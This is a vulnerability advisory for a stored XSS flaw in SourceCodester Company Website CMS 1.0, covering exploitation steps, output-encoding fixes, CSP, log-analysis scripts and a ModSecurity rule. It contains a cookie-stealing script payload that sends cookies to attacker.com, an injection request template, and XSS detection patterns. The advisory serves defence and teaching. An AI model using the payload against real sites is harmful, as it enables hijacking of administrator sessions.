How the CVE Works
CVE-2025-29710 is a stored Cross-Site Scripting (XSS) vulnerability in SourceCodester Company Website CMS 1.0. The flaw is in the `/dashboard/Services` endpoint: a service entry submitted there is stored and later rendered in the dashboard without output encoding. An attacker who can create or edit a service entry can embed JavaScript in it, and that script runs in the browser of every administrator who views the service list. Because the victim is an authenticated dashboard user, the script executes with that user's session: it can read the session cookie (unless it is marked HttpOnly), issue requests to the backend as the admin, or alter other content. Once stored, the payload fires on every page load with no further action by the attacker; the only interaction needed is the admin's routine visit to the list.
DailyCVE Form
Platform: SourceCodester CMS
Version: 1.0
Vulnerability: Stored XSS
Severity: Critical
Date: 04/23/2025
What Undercode Says:
Exploitation
1. Craft Malicious Payload:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
2. Inject via Services:
The endpoint is authenticated, so the request must carry a valid dashboard session, and the payload is URL-encoded in the form body:
POST /dashboard/Services HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

service_name=<malicious_script>&submit=Save
3. Trigger Execution: the administrator opens /dashboard/Services, and the stored payload executes in their browser session.
Protection
1. Output Encoding: encode the value where it is written into HTML (not only on input), so a stored entry can never become markup:
$service_name = htmlspecialchars($_POST['service_name'], ENT_QUOTES, 'UTF-8');
Apply the same encoding at every place the stored name is echoed into a page. The encoding must match the output context (HTML body, attribute, JavaScript string); a templating layer with automatic escaping is the most reliable way to get that right.
2. CSP Header (defense in depth, not a replacement for encoding):
Content-Security-Policy: default-src 'self'; script-src 'self'
'unsafe-inline' must not appear in script-src: it would allow exactly the inline <script> block this vulnerability injects, and 'unsafe-eval' widens the attack surface further.
3. Patch Update: apply the vendor fix if one is published; otherwise apply the output-encoding change above to the dashboard templates.
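The following is an added illustration, not code from the CMS or from this advisory. It models in Python what the exploitation and protection steps above describe for the PHP dashboard: the same service-list row rendered once by a template that splices the stored value in raw (the vulnerable behaviour) and once through output encoding, with html.escape(quote=True) standing in for htmlspecialchars($s, ENT_QUOTES, 'UTF-8'). The payload and the "Web Design & Hosting" entry are constructed inputs; the function names are this example's own.

```python
import html
import re

# Constructed inputs (not captured traffic): the payload from the write-up and a
# benign entry that happens to contain a character HTML encoding must touch.
ATTACKER_SERVICE_NAME = (
    "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"
)
BENIGN_SERVICE_NAME = "Web Design & Hosting"


def render_service_row_vulnerable(service_name: str) -> str:
    """Model of the faulty dashboard template: the stored value is spliced
    into the HTML unchanged, so any markup it carries becomes part of the page
    that the administrator's browser parses and executes."""
    return f"<tr><td>{service_name}</td></tr>"


def render_service_row_fixed(service_name: str) -> str:
    """Same template with output encoding at render time. html.escape(quote=True)
    is the Python counterpart of PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8'):
    it rewrites & < > " and ' so the browser renders the value as text."""
    return f"<tr><td>{html.escape(service_name, quote=True)}</td></tr>"


# Sufficient for this demonstration: a real <script> opening tag surviving into
# the rendered HTML means the stored payload will run when the page loads.
SCRIPT_OPEN_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(rendered_html: str) -> bool:
    return SCRIPT_OPEN_TAG.search(rendered_html) is not None


def service_list_page(service_names, fixed: bool) -> str:
    """Render a whole service list the way the dashboard would, using either
    the vulnerable or the fixed row renderer. This is the 'stored' part of the
    bug: the payload fires on every page load, not only on the request that
    submitted it."""
    render = render_service_row_fixed if fixed else render_service_row_vulnerable
    rows = "".join(render(name) for name in service_names)
    return f"<table>{rows}</table>"


if __name__ == "__main__":
    stored = [BENIGN_SERVICE_NAME, ATTACKER_SERVICE_NAME]
    print("vulnerable page carries live script:", contains_live_script(service_list_page(stored, fixed=False)))
    print("fixed page carries live script:     ", contains_live_script(service_list_page(stored, fixed=True)))
    print(render_service_row_fixed(ATTACKER_SERVICE_NAME))
```

Entity encoding is the right fix only for the HTML-body context shown here; if the stored name is ever written inside an attribute value or a JavaScript string, that context needs its own encoding, which is why auto-escaping templates are preferred over hand-placed calls.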
Detection
1. Automated scanning: sqlmap is an SQL injection tool and has no XSS mode (its --technique option only accepts SQL injection technique letters such as B, E, U, S, T, Q), so it cannot test for this bug. Use a dedicated XSS scanner or the manual check below.
2. Manual Testing: log in to the dashboard, submit a harmless probe carrying a unique marker as the service name, for example <script>alert('xss-29710')</script> (the marker is arbitrary, chosen only so it is easy to search for), reload /dashboard/Services, and check whether the marker appears in the page source as a real <script> tag rather than as &lt;script&gt;. An alert firing in the browser confirms execution.
Log Analysis
Check Apache access logs for XSS markers in request targets:
grep -i "script" /var/log/apache2/access.log | awk '{print $1, $7}'
This only sees what is in the request line. A payload submitted in a POST body, as in the exploitation steps above, never reaches access.log, and encoded event-handler payloads (for example %3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E) do not contain the word "script" at all. Enable request-body logging (for example the ModSecurity audit log) or inspect the CMS service table directly to find stored payloads.
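As an added example (not part of the original write-up), this Python script does what the grep above cannot: it parses Apache combined-format lines, URL-decodes the request target, and matches several XSS indicators rather than the single word "script", while separately listing POSTs to the vulnerable endpoint whose bodies the access log does not contain. The log lines, client addresses and timestamps are constructed for the example, and the indicator list and function names are this example's own.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines, not real traffic. Lines 1 and 2 carry a
# URL-encoded probe in the query string; line 3 is an ordinary admin page view;
# line 4 is the POST from the exploitation steps, whose body Apache does not log.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [23/Apr/2025:10:02:11 +0000] "GET /dashboard/Services?service_name=%3Cscript%3Efetch('https://attacker.com/steal?cookie='%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Apr/2025:10:02:40 +0000] "GET /dashboard/Services?service_name=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 1431 "-" "Mozilla/5.0"
198.51.100.2 - - [23/Apr/2025:10:05:03 +0000] "GET /dashboard/Services HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Apr/2025:10:06:15 +0000] "POST /dashboard/Services HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Common-log prefix: client, ident, user, [timestamp], "METHOD target PROTO" status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Indicators beyond the literal word "script": inline event handlers,
# javascript: URIs and other script-bearing tags are what a plain grep misses.
XSS_INDICATORS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*\w+[^>]*\son\w+\s*=", re.I),          # <img src=x onerror=...>
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"<\s*(?:iframe|svg|object|embed)\b", re.I),
]


def decode_target(target: str) -> str:
    """URL-decode the request target twice so double-encoded probes
    (%253C -> %3C -> <) are normalised before matching."""
    return unquote_plus(unquote_plus(target))


def find_xss_attempts(log_text: str):
    """Return (ip, method, decoded_target) for every request whose target
    matches an XSS indicator after decoding."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        decoded = decode_target(m["target"])
        if any(p.search(decoded) for p in XSS_INDICATORS):
            hits.append((m["ip"], m["method"], decoded))
    return hits


def posts_to_endpoint(log_text: str, path: str = "/dashboard/Services"):
    """POSTs to the vulnerable endpoint. Their bodies are not in the access log,
    so these can only be flagged for correlation with application or WAF audit
    logs; on their own they are not evidence of an XSS attempt."""
    found = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m and m["method"] == "POST" and m["target"].split("?")[0] == path:
            found.append((m["ip"], m["ts"]))
    return found


def attempts_per_ip(log_text: str) -> dict:
    """Count matching requests per client, the 'repeated attempts' view."""
    return dict(Counter(ip for ip, _, _ in find_xss_attempts(log_text)))


if __name__ == "__main__":
    for ip, method, target in find_xss_attempts(SAMPLE_ACCESS_LOG):
        print(f"{ip} {method} {target}")
    print("POSTs needing body-level correlation:", posts_to_endpoint(SAMPLE_ACCESS_LOG))
    print("attempts per client:", attempts_per_ip(SAMPLE_ACCESS_LOG))
```

Run it against a real access.log by passing the file contents to find_xss_attempts; the second sample line is caught only because the target is decoded before matching and because an event-handler pattern is in the list, neither of which a literal grep for "script" provides.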
Mitigation Commands
1. WAF Rule (ModSecurity), as a stopgap while the application is fixed:
SecRule ARGS "@contains <script" "id:1005,phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'XSS Attempt'"
The transformations matter: without t:lowercase and t:urlDecodeUni the rule misses <ScRiPt> and %3Cscript%3E, and phase:2 is needed for POST-body arguments to be inspected. A single signature is still bypassed by event-handler payloads such as <img src=x onerror=...>, so prefer the OWASP Core Rule Set XSS rules (REQUEST-941-APPLICATION-ATTACK-XSS.conf) over a hand-written pattern.
2. Take the dashboard offline until patched:
sudo a2dissite dashboard.conf && sudo systemctl reload apache2
a2dissite disables an entire virtual host, not a single endpoint; dashboard.conf stands for whichever vhost file serves the CMS, and this takes the whole admin area offline, not only /dashboard/Services.
References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29710
- MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29710
Sources:
Reported By: nvd.nist.gov